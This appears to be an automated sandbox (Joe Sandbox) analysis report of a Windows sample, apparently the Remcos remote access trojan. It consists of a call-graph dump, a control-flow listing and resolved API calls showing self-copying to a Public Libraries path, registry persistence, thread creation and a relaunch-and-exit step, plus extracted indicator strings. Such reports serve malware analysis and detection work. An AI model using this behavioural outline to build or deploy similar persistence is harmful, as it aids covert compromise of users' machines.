47172->47178 47174 40f126 47175 401e65 22 API calls 47174->47175 47176 40f138 47175->47176 47179 40f13f CreateThread 47176->47179 47177 40f1cc 47180 401e65 22 API calls 47177->47180 47178->47177 47181 401e65 22 API calls 47178->47181 47179->47170 47810 419fb4 109 API calls 2 library calls 47179->47810 47183 40f1d5 47180->47183 47182 40f17e 47181->47182 47185 401e65 22 API calls 47182->47185 47184 40f21a 47183->47184 47187 401e65 22 API calls 47183->47187 47542 41b60d 80 API calls 47184->47542 47188 40f193 47185->47188 47190 40f1ea 47187->47190 47539 40d9e8 32 API calls 47188->47539 47189 40f223 47191 401f13 28 API calls 47189->47191 47194 401e65 22 API calls 47190->47194 47193 40f22e 47191->47193 47196 401f09 11 API calls 47193->47196 47197 40f1ff 47194->47197 47195 40f1a6 47198 401f13 28 API calls 47195->47198 47199 40f237 CreateThread 47196->47199 47540 43baac 39 API calls _strftime 47197->47540 47200 40f1b2 47198->47200 47202 40f264 47199->47202 47203 40f258 CreateThread 47199->47203 47806 40f7a7 120 API calls 47199->47806 47204 401f09 11 API calls 47200->47204 47205 40f279 47202->47205 47206 40f26d CreateThread 47202->47206 47203->47202 47807 4120f7 138 API calls 47203->47807 47208 40f1bb CreateThread 47204->47208 47210 40f2cc 47205->47210 47212 402093 28 API calls 47205->47212 47206->47205 47808 4126db 38 API calls ___scrt_fastfail 47206->47808 47208->47177 47809 401be9 49 API calls _strftime 47208->47809 47209 40f20c 47541 40c162 7 API calls 47209->47541 47544 4134ff RegOpenKeyExA RegQueryValueExA RegCloseKey 47210->47544 47213 40f29c 47212->47213 47543 4052fd 28 API calls 47213->47543 47216 40f2e4 47216->47071 47219 41bc5e 28 API calls 47216->47219 47221 40f2fd 47219->47221 47545 41361b 31 API calls 47221->47545 47226 40f313 47227 401f09 11 API calls 47226->47227 47230 40f31e 47227->47230 47228 40f346 DeleteFileW 47229 40f34d 47228->47229 47228->47230 47229->47050 47230->47228 47230->47229 47231 40f334 Sleep 47230->47231 47231->47230 47232->46920 47233->46924 47234->46929 47235->46927 47236->46937 47237->46938 47238->46940 47239->46943 47240->46947 47241->46949 47242->46951 47243->46954 47245 434b27 GetStartupInfoW 47244->47245 47245->46958 47247 44f06b 47246->47247 47248 44f062 47246->47248 47247->46961 47251 44ef58 48 API calls 4 library calls 47248->47251 47250->46961 47251->47247 47253 41cb8f LoadLibraryA GetProcAddress 47252->47253 47254 41cb7f GetModuleHandleA GetProcAddress 47252->47254 47255 41cbb8 44 API calls 47253->47255 47256 41cba8 LoadLibraryA GetProcAddress 47253->47256 47254->47253 47255->46966 47256->47255 47551 41b4a8 FindResourceA 47257->47551 47261 40f3ed ctype 47561 4020b7 47261->47561 47264 401fe2 28 API calls 47265 40f413 47264->47265 47266 401fd8 11 API calls 47265->47266 47267 40f41c 47266->47267 47268 43bd51 ___std_exception_copy 21 API calls 47267->47268 47269 40f42d ctype 47268->47269 47567 406dd8 47269->47567 47271 40f460 47271->46968 47273 40210c 47272->47273 47274 4023ce 11 API calls 47273->47274 47275 402126 47274->47275 47276 402569 28 API calls 47275->47276 47277 402134 47276->47277 47277->46971 47604 4020df 47278->47604 47280 41be9e 47281 401fd8 11 API calls 47280->47281 47282 41bed0 47281->47282 47284 401fd8 11 API calls 47282->47284 47283 41bea0 47610 4041a2 28 API calls 47283->47610 47287 41bed8 47284->47287 47289 401fd8 11 API calls 47287->47289 47288 41beac 47290 401fe2 28 API calls 47288->47290 47292 40ea24 47289->47292 47293 41beb5 47290->47293 47291 401fe2 28 API calls 47299 41be2e 47291->47299 47300 40fb17 47292->47300 47294 401fd8 11 API calls 47293->47294 47296 41bebd 47294->47296 47295 401fd8 11 API calls 47295->47299 47611 41ce34 28 API calls 47296->47611 47299->47280 47299->47283 47299->47291 47299->47295 47608 4041a2 28 API calls 47299->47608 47609 41ce34 28 API calls 47299->47609 47301 40fb23 47300->47301 47303 40fb2a 47300->47303 47612 402163 11 API calls 47301->47612 47303->46976 47305 402163 47304->47305 47306 40219f 47305->47306 47613 402730 11 API calls 47305->47613 47306->46978 47308 402184 47614 402712 11 API calls std::_Deallocate 47308->47614 47311 401e6d 47310->47311 47312 401e75 47311->47312 47615 402158 22 API calls 47311->47615 47312->46984 47316 4020df 11 API calls 47315->47316 47317 40532a 47316->47317 47616 4032a0 47317->47616 47319 405346 47319->46991 47621 4051ef 47320->47621 47322 406391 47625 402055 47322->47625 47325 401fe2 47326 401ff1 47325->47326 47333 402039 47325->47333 47327 4023ce 11 API calls 47326->47327 47328 401ffa 47327->47328 47329 40203c 47328->47329 47331 402015 47328->47331 47330 40267a 11 API calls 47329->47330 47330->47333 47640 403098 28 API calls 47331->47640 47334 401fd8 47333->47334 47335 4023ce 11 API calls 47334->47335 47336 401fe1 47335->47336 47336->47003 47338 401fd2 47337->47338 47339 401fc9 47337->47339 47338->47009 47641 4025e0 28 API calls 47339->47641 47642 401fab 47341->47642 47343 40d073 CreateMutexA GetLastError 47343->47025 47643 41bfb7 47344->47643 47349 401fe2 28 API calls 47350 41b2ff 47349->47350 47351 401fd8 11 API calls 47350->47351 47352 41b307 47351->47352 47353 4135a6 31 API calls 47352->47353 47355 41b35d 47352->47355 47354 41b330 47353->47354 47356 41b33b StrToIntA 47354->47356 47355->47032 47357 41b349 47356->47357 47360 41b352 47356->47360 47652 41cf69 22 API calls 47357->47652 47358 401fd8 11 API calls 47358->47355 47360->47358 47362 40772a 47361->47362 47363 413549 3 API calls 47362->47363 47364 407731 47363->47364 47364->47042 47364->47043 47366 41bc72 47365->47366 47653 40b904 47366->47653 47368 41bc7a 47368->47059 47370 401f22 47369->47370 47371 401f6a 47369->47371 47372 402252 11 API calls 47370->47372 47378 401f09 47371->47378 47373 401f2b 47372->47373 47374 401f6d 47373->47374 47375 401f46 47373->47375 47686 402336 47374->47686 47685 40305c 28 API calls 47375->47685 47379 402252 11 API calls 47378->47379 47380 401f12 47379->47380 47380->47070 47690 401f86 47381->47690 47384 40da70 47700 41b5b4 29 API calls 47384->47700 47385 40daa5 47388 41bfb7 2 API calls 47385->47388 47387 40db99 GetLongPathNameW 47694 40417e 47387->47694 47391 40daaa 47388->47391 47389 40da79 47392 401f13 28 API calls 47389->47392 47394 40db00 47391->47394 47395 40daae 47391->47395 47396 40da83 47392->47396 47399 40417e 28 API calls 47394->47399 47400 40417e 28 API calls 47395->47400 47404 401f09 11 API calls 47396->47404 47397 40da66 47397->47387 47398 40417e 28 API calls 47402 40dbbd 47398->47402 47403 40db0e 47399->47403 47401 40dabc 47400->47401 47409 40417e 28 API calls 47401->47409 47703 40ddd1 28 API calls 47402->47703 47408 40417e 28 API calls 47403->47408 47404->47397 47406 40dbd0 47704 402fa5 28 API calls 47406->47704 47411 40db24 47408->47411 47412 40dad2 47409->47412 47410 40dbdb 47705 402fa5 28 API calls 47410->47705 47702 402fa5 28 API calls 47411->47702 47701 402fa5 28 API calls 47412->47701 47416 40dbe5 47419 401f09 11 API calls 47416->47419 47417 40db2f 47420 401f13 28 API calls 47417->47420 47418 40dadd 47421 401f13 28 API calls 47418->47421 47422 40dbef 47419->47422 47423 40db3a 47420->47423 47424 40dae8 47421->47424 47425 401f09 11 API calls 47422->47425 47426 401f09 11 API calls 47423->47426 47427 401f09 11 API calls 47424->47427 47428 40dbf8 47425->47428 47429 40db43 47426->47429 47430 40daf1 47427->47430 47431 401f09 11 API calls 47428->47431 47432 401f09 11 API calls 47429->47432 47433 401f09 11 API calls 47430->47433 47434 40dc01 47431->47434 47432->47396 47433->47396 47435 401f09 11 API calls 47434->47435 47436 40dc0a 47435->47436 47437 401f09 11 API calls 47436->47437 47438 40dc13 47437->47438 47438->47107 47440 40ce0c _wcslen 47439->47440 47441 40ce60 47440->47441 47442 40ce16 47440->47442 47443 40da34 32 API calls 47441->47443 47445 40ce1f CreateDirectoryW 47442->47445 47444 40ce72 47443->47444 47446 401f13 28 API calls 47444->47446 47707 40915b 47445->47707 47448 40ce5e 47446->47448 47451 401f09 11 API calls 47448->47451 47449 40ce3b 47741 403014 47449->47741 47456 40ce89 47451->47456 47453 401f13 28 API calls 47454 40ce55 47453->47454 47455 401f09 11 API calls 47454->47455 47455->47448 47457 40cea2 47456->47457 47458 40cebf 47456->47458 47460 40cd0d 31 API calls 47457->47460 47459 40cec8 CopyFileW 47458->47459 47461 40cf99 47459->47461 47462 40ceda _wcslen 47459->47462 47494 40ceb3 47460->47494 47714 40cd0d 47461->47714 47462->47461 47465 40cef6 47462->47465 47466 40cf49 47462->47466 47470 40da34 32 API calls 47465->47470 47469 40da34 32 API calls 47466->47469 47467 40cfb3 47476 40cfbc SetFileAttributesW 47467->47476 47468 40cfdf 47472 40d027 CloseHandle 47468->47472 47478 40417e 28 API calls 47468->47478 47473 40cf4f 47469->47473 47471 40cefc 47470->47471 47475 401f13 28 API calls 47471->47475 47740 401f04 47472->47740 47474 401f13 28 API calls 47473->47474 47479 40cf43 47474->47479 47480 40cf08 47475->47480 47493 40cfcb _wcslen 47476->47493 47482 40cff5 47478->47482 47487 401f09 11 API calls 47479->47487 47483 401f09 11 API calls 47480->47483 47481 40d043 ShellExecuteW 47484 40d060 ExitProcess 47481->47484 47485 40d056 47481->47485 47486 41bc5e 28 API calls 47482->47486 47488 40cf11 47483->47488 47489 40d069 CreateMutexA GetLastError 47485->47489 47490 40d008 47486->47490 47491 40cf61 47487->47491 47492 40915b 28 API calls 47488->47492 47489->47494 47747 413814 RegCreateKeyW 47490->47747 47498 40cf6d CreateDirectoryW 47491->47498 47495 40cf25 47492->47495 47493->47468 47496 40cfdc SetFileAttributesW 47493->47496 47494->47114 47499 403014 28 API calls 47495->47499 47496->47468 47746 401f04 47498->47746 47502 40cf31 47499->47502 47505 401f13 28 API calls 47502->47505 47503 401f09 11 API calls 47503->47472 47507 40cf3a 47505->47507 47508 401f09 11 API calls 47507->47508 47508->47479 47509->46983 47510->46992 47511->46996 47513->47017 47515 40eba4 47514->47515 47516 413573 RegQueryValueExA RegCloseKey 47514->47516 47515->47014 47515->47031 47516->47515 47517->47021 47518->47049 47519->47043 47520->47035 47521->47047 47522->47119 47523->47138 47524->47100 47526 40209b 47525->47526 47527 4023ce 11 API calls 47526->47527 47528 4020a6 47527->47528 47800 4024ed 47528->47800 47531->47118 47532->47124 47533->47132 47534->47141 47535->47149 47536->47160 47537->47165 47538->47174 47539->47195 47540->47209 47541->47184 47542->47189 47544->47216 47545->47226 47546->47041 47548->47061 47549->47074 47804 41ad17 104 API calls 47550->47804 47552 41b4c5 LoadResource LockResource SizeofResource 47551->47552 47553 40f3de 47551->47553 47552->47553 47554 43bd51 47553->47554 47559 446137 __Getctype 47554->47559 47555 446175 47571 4405dd 20 API calls _free 47555->47571 47556 446160 RtlAllocateHeap 47558 446173 47556->47558 47556->47559 47558->47261 47559->47555 47559->47556 47570 442f80 7 API calls 2 library calls 47559->47570 47562 4020bf 47561->47562 47572 4023ce 47562->47572 47564 4020ca 47576 40250a 47564->47576 47566 4020d9 47566->47264 47568 4020b7 28 API calls 47567->47568 47569 406dec 47568->47569 47569->47271 47570->47559 47571->47558 47573 402428 47572->47573 47574 4023d8 47572->47574 47573->47564 47574->47573 47583 4027a7 11 API calls std::_Deallocate 47574->47583 47577 40251a 47576->47577 47578 402520 47577->47578 47579 402535 47577->47579 47584 402569 47578->47584 47594 4028e8 28 API calls 47579->47594 47582 402533 47582->47566 47583->47573 47595 402888 47584->47595 47586 40257d 47587 402592 47586->47587 47588 4025a7 47586->47588 47600 402a34 22 API calls 47587->47600 47602 4028e8 28 API calls 47588->47602 47591 40259b 47601 4029da 22 API calls 47591->47601 47593 4025a5 47593->47582 47594->47582 47596 402890 47595->47596 47597 402898 47596->47597 47603 402ca3 22 API calls 47596->47603 47597->47586 47600->47591 47601->47593 47602->47593 47605 4020e7 47604->47605 47606 4023ce 11 API calls 47605->47606 47607 4020f2 47606->47607 47607->47299 47608->47299 47609->47299 47610->47288 47611->47280 47612->47303 47613->47308 47614->47306 47618 4032aa 47616->47618 47617 4032c9 47617->47319 47618->47617 47620 4028e8 28 API calls 47618->47620 47620->47617 47622 4051fb 47621->47622 47631 405274 47622->47631 47624 405208 47624->47322 47626 402061 47625->47626 47627 4023ce 11 API calls 47626->47627 47628 40207b 47627->47628 47636 40267a 47628->47636 47632 405282 47631->47632 47635 4028a4 22 API calls 47632->47635 47637 40268b 47636->47637 47638 4023ce 11 API calls 47637->47638 47639 40208d 47638->47639 47639->47325 47640->47333 47641->47338 47644 41bfc4 GetCurrentProcess IsWow64Process 47643->47644 47645 41b2d1 47643->47645 47644->47645 47646 41bfdb 47644->47646 47647 4135a6 RegOpenKeyExA 47645->47647 47646->47645 47648 4135d4 RegQueryValueExA RegCloseKey 47647->47648 47649 4135fe 47647->47649 47648->47649 47650 402093 28 API calls 47649->47650 47651 413613 47650->47651 47651->47349 47652->47360 47654 40b90c 47653->47654 47659 402252 47654->47659 47656 40b917 47663 40b92c 47656->47663 47658 40b926 47658->47368 47660 4022ac 47659->47660 47661 40225c 47659->47661 47660->47656 47661->47660 47670 402779 11 API calls std::_Deallocate 47661->47670 47664 40b966 47663->47664 47665 40b938 47663->47665 47682 4028a4 22 API calls 47664->47682 47671 4027e6 47665->47671 47669 40b942 47669->47658 47670->47660 47672 4027ef 47671->47672 47673 402851 47672->47673 47674 4027f9 47672->47674 47684 4028a4 22 API calls 47673->47684 47677 402802 47674->47677 47679 402815 47674->47679 47683 402aea 28 API calls __EH_prolog 47677->47683 47678 402813 47678->47669 47679->47678 47681 402252 11 API calls 47679->47681 47681->47678 47683->47678 47685->47371 47687 402347 47686->47687 47688 402252 11 API calls 47687->47688 47689 4023c7 47688->47689 47689->47371 47691 401f8e 47690->47691 47692 402252 11 API calls 47691->47692 47693 401f99 47692->47693 47693->47384 47693->47385 47693->47397 47695 404186 47694->47695 47696 402252 11 API calls 47695->47696 47697 404191 47696->47697 47706 4041bc 28 API calls 47697->47706 47699 40419c 47699->47398 47700->47389 47701->47418 47702->47417 47703->47406 47704->47410 47705->47416 47706->47699 47708 401f86 11 API calls 47707->47708 47709 409167 47708->47709 47753 40314c 47709->47753 47711 409184 47757 40325d 47711->47757 47713 40918c 47713->47449 47715 40cd33 47714->47715 47716 40cd6f 47714->47716 47771 40b97c 47715->47771 47718 40cdb0 47716->47718 47721 40b97c 28 API calls 47716->47721 47720 40cdf1 47718->47720 47723 40b97c 28 API calls 47718->47723 47720->47467 47720->47468 47724 40cd86 47721->47724 47722 403014 28 API calls 47725 40cd4f 47722->47725 47726 40cdc7 47723->47726 47727 403014 28 API calls 47724->47727 47728 413814 14 API calls 47725->47728 47729 403014 28 API calls 47726->47729 47730 40cd90 47727->47730 47731 40cd63 47728->47731 47732 40cdd1 47729->47732 47733 413814 14 API calls 47730->47733 47735 401f09 11 API calls 47731->47735 47736 413814 14 API calls 47732->47736 47734 40cda4 47733->47734 47737 401f09 11 API calls 47734->47737 47735->47716 47738 40cde5 47736->47738 47737->47718 47739 401f09 11 API calls 47738->47739 47739->47720 47778 403222 47741->47778 47743 403022 47782 403262 47743->47782 47748 413866 47747->47748 47750 413829 47747->47750 47749 401f09 11 API calls 47748->47749 47751 40d01b 47749->47751 47752 413842 RegSetValueExW RegCloseKey 47750->47752 47751->47503 47752->47748 47755 403156 47753->47755 47754 403175 47754->47711 47755->47754 47756 4027e6 28 API calls 47755->47756 47756->47754 47758 40323f 47757->47758 47761 4036a6 47758->47761 47760 40324c 47760->47713 47762 402888 22 API calls 47761->47762 47763 4036b9 47762->47763 47764 40372c 47763->47764 47765 4036de 47763->47765 47770 4028a4 22 API calls 47764->47770 47768 4027e6 28 API calls 47765->47768 47769 4036f0 47765->47769 47768->47769 47769->47760 47772 401f86 11 API calls 47771->47772 47773 40b988 47772->47773 47774 40314c 28 API calls 47773->47774 47775 40b9a4 47774->47775 47776 40325d 28 API calls 47775->47776 47777 40b9b7 47776->47777 47777->47722 47779 40322e 47778->47779 47788 403618 47779->47788 47781 40323b 47781->47743 47783 40326e 47782->47783 47784 402252 11 API calls 47783->47784 47785 403288 47784->47785 47786 402336 11 API calls 47785->47786 47787 403031 47786->47787 47787->47453 47789 403626 47788->47789 47790 403644 47789->47790 47791 40362c 47789->47791 47793 40365c 47790->47793 47794 40369e 47790->47794 47792 4036a6 28 API calls 47791->47792 47798 403642 47792->47798 47797 4027e6 28 API calls 47793->47797 47793->47798 47799 4028a4 22 API calls 47794->47799 47797->47798 47798->47781 47801 4024f9 47800->47801 47802 40250a 28 API calls 47801->47802 47803 4020b1 47802->47803 47803->47111 47812 4127ee 61 API calls 47807->47812 47813 44375d 47814 443766 47813->47814 47815 44377f 47813->47815 47816 44376e 47814->47816 47820 4437e5 47814->47820 47818 443776 47818->47816 47831 443ab2 22 API calls 2 library calls 47818->47831 47821 4437f1 47820->47821 47822 4437ee 47820->47822 47832 44f3dd GetEnvironmentStringsW 47821->47832 47822->47818 47827 443809 47840 446782 20 API calls _free 47827->47840 47828 443833 47828->47818 47830 4437fe 47841 446782 20 API calls _free 47830->47841 47831->47815 47833 4437f8 47832->47833 47834 44f3f1 47832->47834 47833->47830 47839 44390a 26 API calls 3 library calls 47833->47839 47842 446137 47834->47842 47836 44f405 ctype 47849 446782 20 API calls _free 47836->47849 47838 44f41f FreeEnvironmentStringsW 47838->47833 47839->47827 47840->47830 47841->47828 47843 446175 47842->47843 47847 446145 __Getctype 47842->47847 47851 4405dd 20 API calls _free 47843->47851 47844 446160 RtlAllocateHeap 47846 446173 47844->47846 47844->47847 47846->47836 47847->47843 47847->47844 47850 442f80 7 API calls 2 library calls 47847->47850 47849->47838 47850->47847 47851->47846 47852 43be58 47853 43be64 _swprintf CallCatchBlock 47852->47853 47854 43be72 47853->47854 47856 43be9c 47853->47856 47868 4405dd 20 API calls _free 47854->47868 47863 445888 EnterCriticalSection 47856->47863 47858 43bea7 47864 43bf48 47858->47864 47859 43be77 __cftof CallCatchBlock 47863->47858 47865 43bf56 47864->47865 47867 43beb2 47865->47867 47870 44976c 36 API calls 2 library calls 47865->47870 47869 43becf LeaveCriticalSection std::_Lockit::~_Lockit 47867->47869 47868->47859 47869->47859 47870->47865

                                                                                        Executed Functions

                                                                                        Function 0040E9C5 Relevance: 84.8, APIs: 14, Strings: 34, Instructions: 795COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 5 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 22 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 5->23 69 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 22->69 70 40ebae-40ebc9 call 401e65 call 40b9bd 22->70 49 40eef2-40ef03 call 401fd8 23->49 69->70 101 40f34f-40f36a call 401fab call 4139a9 call 412475 69->101 80 40ec03-40ec0a call 40d069 70->80 81 40ebcb-40ebea call 401fab call 413549 70->81 89 40ec13-40ec1a 80->89 90 40ec0c-40ec0e 80->90 81->80 97 40ebec-40ec02 call 401fab call 4139a9 81->97 94 40ec1c 89->94 95 40ec1e-40ec2a call 41b2c3 89->95 93 40eef1 90->93 93->49 94->95 105 40ec33-40ec37 95->105 106 40ec2c-40ec2e 95->106 97->80 126 40f36f-40f3a0 call 41bc5e call 401f04 call 413a23 call 401f09 * 2 101->126 108 40ec76-40ec89 call 401e65 call 401fab 105->108 109 40ec39 call 407716 105->109 106->105 127 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->127 128 40ec8b call 407755 108->128 117 40ec3e-40ec40 109->117 120 40ec42-40ec47 call 407738 call 407260 117->120 121 40ec4c-40ec5f call 401e65 call 401fab 117->121 120->121 121->108 142 40ec61-40ec67 121->142 157 40f3a5-40f3af call 40dd42 call 414f2a 126->157 177 40ed80-40ed84 127->177 178 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 127->178 128->127 142->108 143 40ec69-40ec6f 142->143 143->108 146 40ec71 call 407260 143->146 146->108 180 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 177->180 181 40ed8a-40ed91 177->181 178->177 205 40ed35-40ed61 call 401e65 call 401fab call 401e65 call 401fab call 40da34 178->205 236 40ef6b-40efbf call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 180->236 183 40ed93-40ee05 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 181->183 184 40ee0f-40ee19 call 409057 181->184 271 40ee0a-40ee0d 183->271 191 40ee1e-40ee42 call 40247c call 434798 184->191 212 40ee51 191->212 213 40ee44-40ee4f call 436e90 191->213 246 40ed66-40ed7b call 401f13 call 401f09 205->246 218 40ee53-40eec8 call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 call 4347a1 call 401e65 call 40b9bd 212->218 213->218 218->236 286 40eece-40eeed call 401e65 call 41bc5e call 40f474 218->286 287 40efc1 236->287 288 40efdc-40efde 236->288 246->177 271->191 286->236 306 40eeef 286->306 292 40efc3-40efda call 41cd9b CreateThread 287->292 289 40efe0-40efe2 288->289 290 40efe4 288->290 289->292 293 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 290->293 292->293 344 40f101 293->344 345 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 293->345 306->93 346 40f103-40f11b call 401e65 call 401fab 344->346 345->346 357 40f159-40f16c call 401e65 call 401fab 346->357 358 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 346->358 368 40f1cc-40f1df call 401e65 call 401fab 357->368 369 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 357->369 358->357 379 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 368->379 380 40f21a-40f23e call 41b60d call 401f13 call 401f09 368->380 369->368 379->380 402 40f240 380->402 403 40f243-40f256 CreateThread 380->403 402->403 404 40f264-40f26b 403->404 405 40f258-40f262 CreateThread 403->405 408 40f279-40f280 404->408 409 40f26d-40f277 CreateThread 404->409 405->404 412 40f282-40f285 408->412 413 40f28e 408->413 409->408 415 40f287-40f28c 412->415 416 40f2cc-40f2e7 call 401fab call 4134ff 412->416 418 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 413->418 415->418 416->157 427 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 416->427 418->416 443 40f346-40f34b DeleteFileW 427->443 444 40f34d 443->444 445 40f32f-40f332 443->445 444->126 445->126 446 40f334-40f341 Sleep call 401f04 445->446 446->443
                                                                                        APIs
                                                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\Public\Libraries\nmfsxfjX.pif,00000104), ref: 0040E9EE
                                                                                          • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                        • String ID: 8SG$8SG$Access Level: $Administrator$C:\Users\Public\Libraries\nmfsxfjX.pif$Exe$Exe$Inj$PSG$Remcos Agent initialized$Rmc-L24XL1$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                                                        • API String ID: 2830904901-3468781824
                                                                                        • Opcode ID: 8a6c2c2187a766e7c71a5247d826f4c94b5c0f918bced47fe90c81bb18daf3e4
                                                                                        • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                                                                        • Opcode Fuzzy Hash: 8a6c2c2187a766e7c71a5247d826f4c94b5c0f918bced47fe90c81bb18daf3e4
                                                                                        • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                                                                        • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                                                                        • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
